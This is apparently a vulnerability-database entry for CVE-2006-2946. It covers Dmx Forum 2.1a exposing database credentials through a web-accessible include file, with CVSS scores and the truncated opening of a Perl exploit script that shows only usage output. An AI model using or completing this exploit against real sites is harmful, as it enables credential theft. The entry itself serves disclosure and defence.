5
CVSSv2

CVE-2006-2946

Published: 12/06/2006 Updated: 08/03/2011
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

Dmx Forum 2.1a stores _includes/bd.inc under the web root with insufficient access control, which allows remote malicious users to obtain database username and password information.

Vulnerable Product Search on Vulmon Subscribe to Product

dmx forum dmx forum

Exploits

#!/usr/bin/perl # # by DarkFig -- wwwacid-rootnewfr # use LWP::Simple; if ( !$ARGV[1] ) { header(); print "\n| Usage: <url> <member_id> ----------------|"; print "\n+------------------------------------------+"; print "\n| Example: localhost/dmx/ 1 ------|"; end(); } sub header { print "\n+--------------------------------- ...